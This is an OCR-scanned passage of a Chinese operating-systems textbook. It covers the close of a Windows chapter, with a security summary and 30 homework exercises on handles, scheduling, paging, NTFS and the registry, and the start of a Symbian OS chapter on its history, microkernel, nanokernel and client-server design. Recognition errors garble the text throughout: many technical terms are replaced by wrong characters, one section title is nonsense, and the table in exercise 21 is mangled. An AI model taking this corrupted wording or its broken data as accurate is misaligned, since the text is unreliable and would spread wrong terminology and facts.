和 进程 所 具有 的 特殊 权限 。 每 个 对 象 有 一 个 与 其 相关 联 的 安全 搬 述 


符 。 安 全 描述 符 指 同一 个 目 主 访问 控制 列表 ， 该 列表 中 包含 允许 或 者 
拒绝 个 体 或 者 组 访问 的 访问 控制 入 口 项 ，Windows 在 最 近 的 发 行 版 本 
中 增加 了 大 量 的 安全 特性 ， 包 括 用 BitLocker 来 加 密 整个 卷 ， 采 用 地 址 
空间 随机 化 ， 不 可 执行 的 堆栈 以 及 其 他 措施 使 得 缓冲 区 次 出 攻击 更 加 
困难 。 


习题 


1.HAL 可 以 跟踪 从 1601 年 开始 的 所 有 时 间 。 举 一 个 例子 ， 说 明 这 


项 功能 的 用 途 。 


2. 在 11.3.2 帮 ， 我 们 介绍 了 在 多 线程 应 用 程序 中 一 个 线程 关闭 了 名 
柄 而 另 一 个 线程 仍然 在 使 用 它们 所 造成 的 问题 。 解 决 此 问题 的 一 种 可 
能 性 是 插入 序列 域 。 请 问 该 方法 是 如 何 起 作用 的 ? 需要 对 系统 做 哪些 
修改 ? 


3.Win32 系 统 没 有 信和 号 功能 。 如 果 要 引入 此 功能 ， 我 们 可 以 将 信号 
设置 为 进程 所 有 ， 线 程 所 有 ， 两 者 都 有 或 者 两 者 都 没有 。 试 着 提出 一 
项 建议 ， 并 解释 为 什么 。 


4. 另 一 种 使 用 DLL 的 方式 是 静态 地 将 每 个 程序 链接 到 它 实 际 调用 
到 那些 库 男 数 ， 既 不 多 也 不 少 。 在 客户 端 机 需 或 者 服务 硕 机 大 上 引入 
此 方法 ， 哪 个 更 合理 ? 


5. 在 Windows 中 线程 拥有 独立 的 用 户 仿 栈 和 内 核 仿 栈 的 原因 是 哪 
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6.TLB 对 性 能 有 重大 的 影响 。 为 了 提高 TLB 的 有 效 性 ，Windows 使 
用 了 大 小 为 4MB 的 页 ， 这 是 什么 ? 


7. 在 一 个 执行 体 对 象 上 可 定义 的 不 同 操作 的 数量 有 没有 限制 ? 如 
果 有 ， 这 个 限制 从 何 而 来 ? 如 果 没 有 ， 请 说 明 为 什么 。 


8.Win32 API 的 调用 WaitForMultipleObjects 以 一 组 同步 对 象 的 句柄 
为 参数 ， 使 得 线程 被 这 组 同步 对 象 阻塞 。 一 旦 它们 中 的 任何 一 个 收 到 
信号 ， 调 用 者 线 程 束 会 被 释放 。 这 组 同步 对 象 是 否 可 以 包含 两 个 信号 
灯 、 一 个 互 斥 体 和 一 个 临界 区 ? 理由 是 什么 ? 提示 :这 不 是 一 个 恶作剧 
的 问题 ， 但 确实 有 必要 认真 考虑 一 番 。 


9. 给 出 三 个 可 能 会 终止 线程 的 原因 。 


10. 如 11.4 方 所 述 ， 有 一 个 特殊 的 句柄 表 用 于 为 进程 和 线程 分 配 
ID。 人 句柄 表 的 算法 通常 是 分 配 第 一 个 可 用 的 句柄 (按照 后 进 先 出 的 顺 
序 维护 空闲 链表 ) 。 在 最 新 发 布 的 Windows 版 本 中 ， 该 算法 变 成 了 ID 
表 忌 古 以 先进 先 出 的 顺序 跟 踩 空 几 链表 。 使 用 后 进 先 出 顺序 分 配 进程 
线 ID 有 什么 潜在 的 问题 ? 为 什么 .UX 操作 系统 没有 这 个 问题 ? 


11. 假 设 时 间 片 配额 个 设置 为 20 坚 秒 ， 当 前 优先 级 为 24 的 线程 在 配 
额 开始 的 时 候 刚 开始 执行 。 突 然 一 个 VO 操作 完成 了 并 且 一 个 优先 级 为 
28 的 线程 变 成 就 绪 状 态 。 这 个 线程 需要 等 待 多 久 才 可 以 使 用 CPU? 


12. 在 Windows Vista 中 ， 妆 前 的 优先 级 总 是 大 于 或 等 于 基本 的 优先 
级 。 是 否 在 某 些 情况 下 当前 的 优先 级 低 于 基本 的 优先 级 也 是 有 意义 
的 ? 看 有 ， 请 举例 。 否 则 请 说 明 原 因 。 


13. 在 Windows 中 很 容易 实现 一 些 设施 将 运行 在 内 核 中 的 线程 临时 
依附 到 其 他 进程 的 地 址 空间 。 为 什么 在 用 户 态 却 很 难 实现 ? 这 样 做 有 
何 目 的 ? 


14. 即 使 有 很 多 空 几 的 可 用 内 存 而 且 内 存 管 理 右 也 不 需要 调整 工作 
集 ， 分 页 系统 仍然 会 经 第 对 人 磁盘 进行 写 操作 。 为 什么 ? 


15. 为 什么 用 来 访问 进程 页 目录 和 页 表 的 物理 页 面 的 目 喘 映射 数据 
总 是 占用 同一 片 4MB 的 内 核 虚 拟 地 址 空间 (在 x86 上 ) ? 


16. 如 果 保 留 了 一 段 虚拟 地 址 空间 但 十 没有 提交 它 ， 你 认为 系统 会 
为 其 创建 一 个 VAD 吗 ? 请 证 明 你 的 答案 。 


17. 在 图 11-36 中 ， 哪 些 转 移 是 由 策略 决定 的 ， 而 不 是 由 系统 事件 
(例如 ， 一 个 进程 退出 并 释放 其 页 面 ， 所 强迫 的 转移 ? 


18. 假 设 一 个 页 面 被 共享 并 且 同 时 存在 于 两 个 工作 集中 。 如 果 它 从 
一 个 工作 集 移出 ， 在 图 11-36 中 它 将 会 到 哪里 去 ? 当 它 从 第 二 个 工作 集 
移出 时 会 发 生 什 么 ? 


19. 当 进程 取消 对 一 个 页 面 的 映射 时 ， 干 净 的 页 会 进行 图 11-36 中 
的 转移 (5) ， 那 脏 的 栈 页 怎样 处 理 呢 ? 为 什么 脏 的 栈 页 面 被 取消 映射 
时 不 会 被 转移 到 已 修改 列表 中 呢 ? 


20. 假 设 一 个 代表 某 种 类 型 互 不 锁 (比如 互 不 对 象 ) 的 分 发 对 象 被 
标记 为 使 用 通知 事件 而 不 是 同步 事件 来 声明 锁 被 释放 。 为 什么 这 样 是 
不 好 的 ? 你 的 回答 在 多 大 程度 上 依赖 于 锁 被 持 有 的 时 间 、 时 间 片 配额 
的 长 度 和 系统 是 否 为 多 处 理 髓 的 ? 


21 一 个 文件 存在 如 下 映射 。 请 给 出 MFT 的 行 串 。 


(hei FE 0 1 2 
2 


3 
磁盘 地 址 50 51 52 22 24 25 26 53 54 60 


22. 考 虑 图 11-43 中 的 MFT 记 录 。 假 设 该 文件 增长 了 并 且 在 文件 的 
末尾 添加 了 第 10 个 块 。 新 块 的 序号 是 66。 现 在 MFT 记 录 会 是 什么 样 
fF? 


23. 在 图 11-46b 中 ， 最 先 的 两 个 行 串 的 长 度 都 为 8 个 块 。 你 应 得 它 
们 长 度 相等 只 是 偶然 的 ， 还 是 跟 压 缩 的 工作 方式 有 关 ? 请 解释 理由 。 


24. 假 如 您 想 创建 Windows Vista 的 精简 版 。 在 图 11-47 中 可 以 取消 
哪些 字段 而 不 削弱 系统 的 安全 性 ? 


25. 由 许多 程序 (Web 浏 览 器 、Office、COM 服 务 器 ) 使 用 的 一 个 
扩展 模型 是 对 程序 所 包含 的 DLL 添加 钩子 函数 来 扩展 其 底层 功能 。 只 
要 在 加 载 DLL 前 仔细 模拟 客户 的 身份 ， 该 模型 对 基于 RPC 的 服务 来 说 
就 是 合理 的 ， 是 这 样 的 吗 ? 为 什么 不 是 ? 


26. 在 NUMA 机 器 上 ， 不 管 何 时 Windows 内 存 管理 器 需要 分 配 物 理 
内 存 来 处 理 页 面 失效 ， 它 总 党 试 从 当前 线程 的 理想 的 处 理 器 的 NUMA 
节点 中 获取 。 为 什么 ? 如 果 线 程 正 运行 在 其 他 处 理 器 上 呢 ? 


27. 系 统 衣 活 时 ， 应 用 程序 可 以 轻易 地 从 基于 卷 的 影子 副本 的 备份 
中 恢复 ， 而 不 是 从 位 盘 状 态 中 恢复 。 请 给 出 几 个 这 样 的 例子 。 


28. 在 某 些 情况 下 为 了 满足 安全 性 的 要 求 需要 为 进程 提供 全 零 的 页 
面 ， 在 11.9 节 中 辐 进 程 的 堆 提 供 内 存 束 是 这 样 的 一 种 情况 。 请 给 出 一 
个 或 者 多 个 其 他 需要 对 页 面 清 零 的 虚拟 内 存 操作 。 


29. 在 当前 所 有 的 Windows 发 行 版 本 中 ，regedit 命 令 可 用 于 导出 部 
分 或 全 部 注册 表 到 一 个 文本 文件 。 在 一 次 工作 会 话 中 保存 注册 表 若 干 
次 ， 看 看 有 什么 变化 。 如 果 您 能 够 在 Windows 中 安装 软件 或 硬件 ， 请 
找 出 安装 或 卸载 程序 或 设备 时 注册 表 有 何 变化 。 


30. 写 一 个 UNIX 程 序 ， 模 拟 用 多 个 流 来 写 一 个 NTFS 文 件 。 它 应 能 
接受 一 个 或 多 个 文件 作为 参数 ， 并 创建 一 个 输出 文件 ， 该 文件 的 一 个 
流 包含 所 有 参数 的 属性 ， 其 他 的 流 包 含 每 个 参数 的 内 容 。 然 后 再 写 一 
个 程序 来 报告 这 些 属性 和 流 并 提取 出 所 有 的 组 成 成 分 。 


第 12 章 ”实例 研究 3: Symbian 操作 系统 


在 前 面 的 两 章 里 ， 我 们 已 经 介绍 了 两 种 在 台式 机 以 及 笔记 本 电脑 
上 通用 的 操作 系统 : Linux 以 及 Windows Vista。 但 实际 上 ， 超 过 90% 的 
CPU 都 并 非 用 于 台式 机 或 笔记 本 电脑 ， 而 是 用 于 骸 入 式 系统 ， 例 如 手 
机 、PDA、 数 码 相 机 、 便 携 式 摄像 机 、 游 戏 机 、iPod、MP3 播 放 妖 、 
CD 播放 絮 、DVD 刻 隶 机、 无 线路 由 右 、 电 视 机 、GPS 接 收 顷 、 激 光 打 
印 机 、 汽 车 ， 以 及 其 他 许多 消费 产品 。 它 们 大 多 使 用 现代 的 32 位 或 64 
位 忆 片 ， 几 乎 全 部 安装 有 成 熟 的 操作 系统 。 但 是 很 少 有 人 意识 到 这 些 
操作 系统 的 存在 。 在 这 一 章 里 ， 我 们 将 研究 和 供 入 式 系统 中 十 分 通用 的 
一 个 操作 系统 : Symbian 操作 系统 。 


Symbian 操 作 系 统 古 一 个 运行 在 一 些 厂 商 的 智能 手机 平台 上 的 操 
作 系 统 。 知 能 手机 因 其 运行 功能 齐全 的 操作 系统 以 及 利用 台式 机 的 特 
性 而 得 名 。Symbian 操 作 系 统 用 来 作为 很 多 厂商 的 多 种 智能 手机 的 基 
础 ， 通 过 精心 设计 ， 专 门 运行 在 智能 手机 平台 上 ， 即 那些 CPU、 AF 
以 及 存储 容量 有 限 、 主 要 针对 通信 的 通用 计算 机 。 


针对 Symbian 操作 系统 的 探讨 将 从 它 的 历史 开始 。 随 后 给 出 这 个 
系统 的 概况 ， 大 致 介绍 它 是 怎样 设计 的 以 及 实现 什么 样 的 功能 。 然 后 
如 前 两 章 那 样 ， 介 绍 Symbian 操作 系统 设计 的 各 个 方面 ， 包 括 进程 、 


内 存 管理 、 MO、 文件 系统 以 及 安全 性 。 最 后 介绍 Symbian 操作 系统 怎 
样 处 理 窜 能 手机 中 的 通信 问题 。 


12.1 Symbian 探 作 系统 的 历史 


UNIX 操 作 系统 有 看 很 长 的 历史 ， 几 乎 与 计算 机 一 样 的 久远 。 
Windows 操 作 系 统 也 有 较 长 的 历史 。 而 Symbian 操作 系统 的 历史 相对 较 
短 。 它 起 源 于 20 世 纪 90 年 代 研 发 的 操作 系统 ， 首 次 出 现 则 是 在 2001 
年 。 鉴 于 Symbian 操作 系统 所 依赖 的 智能 手机 平台 也 是 近期 才 得 到 发 
展 的 ， 这 一 点 应 当 并 不 令 人 惊讶 。 


Symbian 操 作 系 统 起 源 于 掌上 设备 ， 随 后 经 历 了 几 个 版 本 的 升级 
得 到 快速 发 展 。 


12.1.1 Symbian 操作 系统 的 起 源 : Psion 和 EPOC 


Symbian 操作 系统 继承 于 某 些 最 初 的 掌上 设备 。20 世 纪 80 年 代 
末 ， 作 为 将 台式 设备 的 功能 整合 到 小 型 的 可 移动 装置 中 的 一 个 手段 ， 
掌上 设备 得 到 发 展 。 对 掌上 电脑 的 初次 答 试 并 没有 引起 太 多 的 注意 。 
Apple Newton 是 一 个 设计 民 好 的 掌上 电脑 设备 ， 但 只 在 少数 使 用 者 中 
间 流 行 。 虽 然 开 始 很 缓慢 ， 但 20 世 纪 90 年 代 中 期 发 展 的 掌上 电脑 则 已 
经 针对 用 户 以 及 人 们 使 用 移动 设备 的 方式 进行 了 更 好 的 修改 。 和 掌上 电 


脑 最 初 设计 为 PDA， 是 电子 规划 员 的 个 人 数码 助手 ,不断 地 发 展 并 具 
有 了 多 种 功能 。 随 着 它们 的 发 展 ， 在 功能 上 已 经 趋同 于 台式 机 ， 也 相 
应 地 有 了 与 台式 机 同样 的 需求 。 它 们 需要 多 任务 的 处 理 方式 ， 和 需要 增 
加 多 种 形式 的 存储 能 力 ， 需 要 在 输入 输出 上 更 加 灵活 。 


掌上 设备 也 逐渐 包含 了 通信 功能 。 随 着 个 人 设备 的 发 展 ， 个 人 通 
信也 同样 在 发 展 厦 。 移 动 电话 的 使 用 在 20 世 纪 90 年 代 末期 有 了 飞速 的 
发 展 。 因 此 ， 将 掌上 设备 与 移动 电话 相 结合 形成 智能 手机 是 一 件 很 目 
然 的 事情 。 而 随 着 这 种 合并 的 产生 ， 在 掌上 设备 里 运行 的 操作 系统 
不 得 不 发 展 。 


在 20 世 纪 90 年 代 ，Psion 电 脑 公 司 制造 了 PDA 设 备 。1991 年 ，Psion 
生产 了 Series 3 一 一 一 个 配 有 小 尺寸 单 色 显 示 屏 的 小 型 电脑 ， 小 到 可 以 
放 入 口袋 中 。 在 Series 3 之 后 ，1996 年 又 制造 了 具有 红外 功能 的 Series 
3c，1998 年 又 生产 了 具有 更 快 处 理 絮 速度 以 及 更 多 内 存 容量 的 Series 
3mx。 它 们 各 自 均 获得 了 成 功 ， 而 它们 的 成 功 主 要 源 自 其 良好 的 功 耗 
管理 以 及 与 包括 个 人 电脑 和 掌上 设备 在 内 的 其 他 设备 之 间 的 互通 性 。 
程序 是 用 C 语 言 实现 的 ， 利 用 面向 对 象 设计 ， 并 采用 了 “应 用 引 
擎 ”一 一 Symbian 操 作 系 统 发 展 中 的 一 个 重要 部 分 。 这 种 引擎 方案 功能 
强大 。 它 借鉴 了 微 内 核 的 设计 ， 从 而 强调 类 似 于 服务 器 般 的 引 警 的 功 
能 性 一 一 通过 回应 来 自 各 应 用 程序 的 请 求 进行 功能 管理 。 这 种 方式 使 


得 它 可 以 拥有 标准 化 的 API 以 及 利用 对 象 的 抽象 来 使 得 应 用 程序 编程 
者 人 免 于 诸如 数据 格式 等 令 人 麻烦 的 细 证 问题 。 


1996 年 ，Psion 开 始 设 计 一 种 新 型 的 32 位 操作 系统 ， 它 支持 触摸 屏 
上 的 定位 设备 ， 采 用 多 媒体 技术 ， 并 且 具 有 更 丰富 的 通信 功能 
新 的 系统 同时 也 更 加 面向 对 象 ， 并 且 可 以 移植 到 不 同 的 体系 结构 和 设 
备 设计 上 。Psion 的 付出 所 得 到 的 结果 是 系统 EPOC 版 本 1 的 推出 。 
EPOC 由 C++ 编程 实现 ， 并 且 是 彻底 的 面向 对 象 的 设计 。 它 依然 使 用 了 
引 警 方案， 并 将 这 个 设计 理念 扩展 到 协同 访问 系统 服务 和 外 部 设备 的 
一 系列 服务 器 。EPOC 扩 展 了 通信 能 力 ， 开 发 了 多 媒体 ， 引 入 了 新 的 
针对 触摸 屏 等 接口 的 平台 ， 并 通用 化 了 硬件 接口 。 


之 后 EPOC 又 继续 发 展 了 两 个 版 本 : EPOC 版 本 3 (ER3) 和 EPOC 
版 本 5 (ER5) 。 它 们 在 新 的 Psion Series 5 及 Series 7 的 电脑 平台 上 运 
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Psion 同 时 也 试图 强调 它 的 操作 系统 可 以 适用 于 其 他 硬件 平台 。 在 
2000 年 左右 ， 新 的 掌上 设备 发 展 的 最 大 机 会 在 手机 业务 ， 而 在 这 方 
面 ， 众 多 厂商 一 直 都 在 为 它 的 下 一 代 设 备 寻 找 一 个 新 的 先进 的 操作 系 
统 。 为 了 利用 这 些 机 会 ，Psion 与 手机 业 的 巨头 ， 包 括 Nokia、 
Ericsson、Motorola 以 及 Matsushita (Panasonic) ， 成 立 了 一 个 合资 项 
J 用 来 控制 EPOC 操 作 系 统 核 心 的 所 有 权 并 使 其 继续 发 展 。 

一 新 的 内 核 设计 现在 称 为 Symbian 操 作 系 统 。 


12.1.2 ”Symbian 操作 系统 版 本 6 


鉴于 FEPOC 的 最 后 一 个 版 本 为 ER5， 因 此 Symbian 操作 系统 在 2001 
年 以 版 本 6 首发 。 它 利用 了 EPOC 的 灵活 特性 ， 并 主要 面向 几 个 不 同 的 
通用 平台 。 其 设计 非常 灵活 ， 从 而 满足 了 发 展 各 种 高 级 移动 设备 以 及 
手机 的 和 需要， 同时 允许 众多 厂商 具有 区 别 各 目 产 品 的 能 


同时 ，Symbian 操 作 系统 将 会 积极 采用 现代 最 先进 的 、 成 熟 的 天 
键 技术 。 这 更 强化 了 对 于 面 癌 对 象 以 及 客户 机 -服务 器 结构 的 选择 ， 正 
如 它们 在 合式 机 以 及 网 络 世界 的 鳄 加 广泛 的 使 用 。 


Symbian 操作 系统 版 本 6 被 它 的 设计 者 们 称 为 “开放 的 ”。 这 个 “ 开 
放 " 不 同 于 UNIX 以 及 Linux 那 样 的 开源 特性 。 这 里 ,“ 开 放 ?” 指 的 是 这 个 
操作 系统 的 结构 是 公开 的 并 且 是 大 家 均 可 获得 的 。 另 外 ， 所 有 的 系统 
接口 也 都 公开 ， 从 而 鼓励 第 三 方 软件 的 开发 。 


12.1.3 ”Symbian 操作 系统 版 本 7 


Symbian 操作 系统 版 本 6 在 设计 和 功能 上 很 像 EPOC 以 及 版 本 6 以 前 
的 版 本 。 它 的 设计 主要 着 上 腿 于 移动 电话 。 此 后 ， 随 着 越 来 越 多 的 厂 商 
设计 了 移动 电话 ， 即 使 是 EPOC 的 灵活 性 也 不 能 够 应 付 如 此 众多 的 移 
动 电话 对 Symbian 操作 系统 的 使 用 需求 。 


Symbian 操作 系统 版 本 7 保持 了 EPOC 的 台式 机 功能 ， 但 是 大 部 分 
系统 内 部 被 重 写 了 以 包含 多 种 智能 手机 功能 。 操 作 系统 内 核 以 及 操作 
系统 服务 从 用 户 界 面 中 分 离 出 来 。 相 同 的 操作 系统 现在 可 以 在 众多 不 
同 的 智能 手机 平台 上 运行 了 ， 它 们 各 目 拥 有 着 不 同 的 用 户 界面 系统 。 
Symbian 操作 系统 现在 可 以 扩展 以 处 理 新 的 不 可 预期 的 信息 格式 或 者 
用 在 使 用 不 同 的 电话 技术 的 智能 手机 上 “。Symbian 操 作 系 统 版 本 7 发 布 
于 2003 年 。 


12.1.4 今天 的 Symbian 操作 系统 


Symbian 操作 系统 版 本 7 和 是 一 个 重要 的 版 本 ， 因 为 它 将 抽象 性 以 及 
灵活 性 市 入 了 操作 系统 。 然 而 ， 这 种 抽象 是 有 代价 的 。 操 作 系 统 的 性 
能 不 久 便 成 为 一 个 需要 解决 的 问题 。 


于 是 重 写 操作 系统 的 工程 又 开始 了 ， 这 次 主要 看 眼 于 性 能 。 这 个 
新 的 操作 系统 设计 旨 在 保持 Symbian 操作 系统 版 本 7 的 灵活 性 的 同时 提 
高 其 性 能 ， 并 增强 其 安全 性 。Symbian 操 作 系统 版 本 8， 发 布 于 2004 
年 ， 提 高 了 Symbian 操作 系统 的 性 能 ， 尤 其 是 在 其 实时 功能 
Symbian 操作 系统 版 本 9 发 布 于 2005 年 ， 增 加 了 基于 性 能 的 安全 以 及 看 
门 机 制 安 闻 的 概念 。 如 同 Symbian 操作 系统 版 本 7 增加 软件 的 灵活 性 那 
样 ，Symbian 操 作 系 统 版 本 9 增加 了 和 针对 硬件 的 灵活 性 。 一 个 新 的 二 进 
制 模 型 得 到 了 开发 ， 从 而 使 得 硬件 开发 者 可 以 使 用 Symbian 操 作 系 
统 ， 而 不 必 重 新 设计 硬件 使 其 适应 某 一 特定 的 结构 模型 。 


12.2 Symbian 操作 系统 概述 


前 一 节 介 绍 过 ，Symbian 操 作 系统 是 由 一 个 掌上 设备 操作 系统 发 
展 成 为 一 个 以 实时 性 能 作为 目标 的 用 在 智能 手机 平台 上 的 操作 系统 。 
这 一 节 里 我 们 将 对 Symbian 操 作 系统 设 计 中 强 合 的 概念 作 简 单 的 介 
绍 。 这 些 概念 与 如 何 使 用 这 个 操作 系统 妃 思 相关。 


Symbian 十 一 个 独特 的 操作 系统 ， 因 为 它 是 以 智能 手机 作为 目标 
平台 的 。 它 不 是 将 一 般 的 操作 系统 硬 装 入 智能 手机 (有 很 大 的 难 
BE) ， 也 不 是 使 较 大 的 操作 系统 适应 于 较 小 的 平台 。 然 而 ， 它 确实 包 
许多 其 他 大 型 操作 系统 所 具有 的 特性 ， 从 多 任务 到 内 存 管理 再 到 


Symbian 操作 系统 继承 了 其 前 身 的 最 佳 的 特性 ， 具 有 由 EPOC 传 承 
下 来 的 面向 对 象 特性 。 并 且 如 版 本 6 中 所 引入 的 ， 使 用 了 微 内 核 的 设计 
方案 ， 最 小 化 了 内 核 的 开销 ， 将 不 必要 的 功能 移 到 了 用 户 层 进程 。 它 
模仿 EPOC 中 应 用 的 引擎 模 型 ， 使 用 了 客 刻 机 /服务 器 结构 。 它 文 持 多 
种 台式 机 功能 ， 包 括 多 任务 和 多 线程 ， 以 及 可 扩展 存储 系统 。 它 还 继 
承 了 EPOC 中 强调 的 多 媒体 与 通信 。 


12.2.1 面向 对 象 


面 问 对象 是 一 个 意味 着 抽象 的 术语 。 在 一 个 面 问 对象 的 设计 中 ， 
针对 某 个 系统 成 分 的 数据 和 功能 ， 建 立 一 个 抽象 的 实体 ， 称 为 对 象 。 
一 个 对 象 提供 了 具体 的 数据 以 及 功能 ， 但 隐藏 了 具体 实现 。 一 个 合理 
实现 的 对 象 可 以 被 移 除 并 被 另外 一 个 不 同 的 对 象 代 殖 ， 只 要 系统 其 他 
部 分 对 这 个 对 象 的 使 用 (也 即 其 接口 ) 保持 不 变 。 


当面 向 对 象 应 用 到 操作 系统 设计 中 时 ， 束 意味 看 所 有 的 系统 调用 
以 及 内 核 问 功 能 的 使 用 均 要 通过 接口 ， 而 不 能 直接 获取 实际 数据 或 依 
靠 其 他 类 型 的 实现 。 一 个 面 癌 对 象 的 内 核 的 实现 通过 对 象 来 提供 内 核 
功能 。 使 用 内 核 端 对 象 通 常 意味 着 一 个 应 用 程序 具有 一 个 对 象 的 名 
柄 ， 也 吕 是 对 对 象 的 一 个 引用 ， 然 后 通过 这 个 句柄 来 获得 对 该 对 象 撑 
口 的 访问 。 


Symbian 操作 系统 采用 了 面 癌 对 象 的 设计 。 系 统 功能 的 实现 是 隐 
藏 的 ， 系 统 数 据 的 使 用 通过 系统 对 象 已 定义 的 接口 完成 。 在 Linux 等 操 
作 系统 中 ， 构 建 一 个 文件 描述 符 ， 并 将 这 个 描述 符 作 为 open 调 用 的 参 
AL, 而 在 Symbian 操作 系统 中 则 会 创建 一 个 文件 对 象 ， 然 后 调用 该 对 
象 的 open 方 法 。 举 例 来 说 ， 在 Linux 操 作 系统 中 ， 正 如 大 家 所 知道 的 ， 
文件 描述 符 对 应 于 系统 内 存 中 文件 描述 符 表 的 索引 的 整数 表示 ;而 在 
Symbian 操作 系统 中 ， 文 件 系 统 表 的 实现 是 未 知 的， 而 所 有 的 文件 操 
作 是 通过 一 个 特定 的 文件 类 的 对 象 来 实现 的 。 


需要 注意 的 是 Symbian 操作 系统 与 其 他 在 设计 中 运用 了 面 问 对 象 
理念 的 操作 系统 不 同 。 例 如 ， 许 多 操作 系统 设计 使 用 了 抽象 数据 类 
型 ， 人 们 甚至 可 以 说 系统 调用 整个 理念 束 是 通过 将 系统 实现 细 下 对 用 
户 程序 隐藏 起 来 而 实现 了 抽象 。 而 对 于 Symbian 操作 系统 ， 束 个 操作 
系统 的 结构 均 是 面向 对 象 设计 的 。 操 作 系 统 功能 以 及 系统 调用 都 是 与 
系统 对 象 相 联系 的 。 货源 分 配 以 及 保护 则 是 对 应 于 对 象 的 分 配 ， 而 不 
征 系统 调用 的 实现 。 


12.2.2” 微 内 核 设计 


具有 面向 对 象 内 在 特性 的 Symbian 操作 系统 的 内 核 结构 是 微 内 核 
设计 。 内 核 中 包括 最 小 限度 的 系统 功能 以 及 数据 ， 许 多 系统 功能 被 放 
到 了 用 户 空 间 服 务 右 端 。 服 务 右 端 通 过 获得 系统 对 象 的 句柄 并 对 这 些 
对 象 进行 必要 的 系统 调用 来 完成 各 目的 服务 。 用 户 空 间 应 用 程序 与 这 


些 服 务 句 端 进 行 交 互 而 不 是 采取 系统 调用 。 


典型 的 基于 微 内 核 的 操作 系统 初始 化 引导 时 占用 较 少 的 内 存 ， 并 
旦 其 结构 也 更 加 动态 。 当 需要 时 可 以 局 动 服务 器 ， 而 在 局 动 时 并 不 需 
要 全 部 的 服务 右 。 微 内 核 大 多 为 可 插 拔 结构 ， 人 允许 当 需 要 时 加 载 系 统 
模块 并 插入 到 内 核 中 。 因 此 ， 微 内 核 结构 十 分 灵活 : 支持 新 功能 的 代 
码 (例如 ， 新 硬件 驱动 程序 ) 可 以 随时 加 载 和 插入 。 


Symbian 操作 系统 被 设计 为 基于 微 内 核 的 操作 系统 。 通 过 打开 与 
俯 源 服务 右 端 的 连接 访问 系统 资源 ， 闹 源 服务 右 随 后 协同 访问 资源 本 
身 。Symbian 操 作 系统 文 持 对 于 新 的 实现 的 可 插 拔 结构。 对 于 系统 功 
能 的 新 的 实现 可 以 设计 为 系统 对 象 ， 并 动态 插入 到 内 核 中 。 例 如 ， 可 
以 实现 新 的 文件 系统 并 且 在 操作 系统 运行 的 同时 添加 a 到 内 核 中 。 


这 种 微 内 核 的 设计 也 市 来 了 一 些 需 要 探讨 的 话题 。 在 传统 的 操作 
系统 中 一 个 系统 调用 便 已 足够 时 ， 微 内 核 使 用 消 妃 传递 。 性 能 可 能 会 


由 于 对 象 间 通 信 所 增加 的 花费 而 受到 影响 。 在 传统 操作 系统 中 位 于 内 
核 的 那些 功能 被 移 到 用 户 空间 时 效率 可 能 会 降低 。 举 例 来 说 ， 与 可 以 
直接 访问 内 核 数 据 结构 的 windows 内 核 中 的 进程 调度 相 比 ， 进 程 调度 
的 多 函数 调用 的 开销 降低 了 性 能 。 由 于 在 用 户 空间 与 内 核 空 间 对 象 中 
传递 消 思 ， 会 经 解 发 生 特权 级 切换 ， 这 了 束 更 降低 了 它 的 性 能 。 最 后 ， 
在 传统 设计 方案 中 只 用 到 了 一 个 地 址 空间 的 系统 调用 ， 而 这 种 消息 传 
递 以 及 优先 级 转换 意味 着 至 少 需要 用 到 两 个 地 址 空间 来 完成 一 个 微 内 
核 服务 请 求 。 


这 些 性 能 问题 使 得 Symbian 操作 系统 (以 及 其 他 基于 微 内 核 的 操 
作 系 统 ) 的 设计 者 们 对 于 设计 以 及 实现 细节 给 予 了 极 大 关注 。 设 计 的 


重点 是 最 小 化 的 、 紧 竣 的 集中 服务 。 


12.2.3 Symbian 操作 系统 纳 核 


Symbian 操作 系统 的 设计 者 们 在 操作 系统 设计 的 核心 采用 了 一 种 
纳 核 的 结构 来 处 理 微 内 核 所 具有 的 问题 。 正 如 在 微 内 核 结构 中 ， 某 些 
系统 功能 被 移 到 了 用 户 空间 服务 需 端 ，Symbian 操 作 系统 将 需要 复杂 
实现 的 功能 分 离 到 内 核 中 ， 而 只 将 最 基本 的 功能 放 在 系统 核心 的 纳 核 
E 


在 Symbian 操作 系统 中 ， 纳 核 捉 供 部 分 最 基本 的 功能 。 在 纳 核 
中 ， 运 行 在 特权 级 别 的 位 单线 程 完 成 着 十 分 初级 的 功能 。 在 这 一 层 的 
实现 中 包括 调度 同步 操作 、 中 断 处 理 和 同步 对 象 ， 如 互 斥 变量 以 及 信 
号 量 。 这 一 层 中 的 实现 功能 大 多 是 可 抢占 的 ， 而 且 是 非常 初级 的 所 
以 它们 可 以 很 快 ) 。 例 如 ， 动 态 内 存 分 配对 于 纳 核 束 是 过 于 复杂 的 功 


Eo 


oop 


这 种 纳 核 的 设计 需要 一 个 二 级 层次 来 实现 较为 复杂 的 内 核 功能 。 
Symbian 操作 系统 内 核 层 提供 了 操作 系统 所 需要 的 其 他 较为 复杂 的 内 
核 功能 。 每 个 在 Symbian 操作 系统 内 核 层 的 操作 都 二 特 权 级 的 操作 ， 
并 与 纳 核 层 的 初级 操作 一 起 来 完成 更 加 复杂 的 内 核 工作 。 复 杂 的 对 象 
服务 、 用 户 态 线程 、 进 程 调度 以 及 上 下 文 切 换 、 动 态 内 存 、 动 态 库 加 
载 、 复 杂 的 同步 、 对 象 及 进程 间 通 信 只 征 在 这 层 实现 的 部 分 操作 。 这 


层 是 完全 可 抢占 式 的 ， 并 且 中 断 可 以 使 其 对 任何 一 部 分 的 执行 进行 重 
新 调度 ， 即 使 是 在 上 下 文 转换 的 过 程 中 也 可 以 。 


图 12-1 展 示 了 一 个 完整 的 Symbian 操 作 系 统 内 核 的 结构 。 
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12-1 Symbian 操作 系统 内 核 结构 具 有 多 层 


12.2.4 APPR as SRA 


正如 我 们 所 提 到 的 那样 ，Symbian 操 作 系统 使 用 微 内 核 设 计 并 使 
用 客户 机 /服务 器 模型 来 访问 系统 资源 。 需 要 访问 系统 资源 的 应 用 是 客 
户 山 ， 操 作 系统 中 运行 疹 的 用 来 协调 资源 访问 的 程序 是 服务 做 端 。 在 
Linux 中 ， 人 们 可 能 需要 调用 open 来 打开 一 个 文件 ， 在 Windows 中 ， 需 
要 利用 Microsoft API 来 创建 一 个 窗口 ， 而 在 Symbian 操作 系统 中 的 过 程 
均 是 相同 的 ， 首先 建立 一 个 到 服务 器 端的 连 授 ， 服 务 器 端 需要 确认 这 
个 连接 ， 然 后 对 服务 絮 端 发 出 实现 某 个 操作 的 请 求 。 因 此 打开 一 个 文 
件 表示 找到 文件 服务 器 端 ， 调 用 connect 建 立 与 服务 器 端的 连接 ， 然 后 
发 送 给 服务 亏 端 一 个 附 有 某 特 定 文件 名 字 的 open 请 求 。 


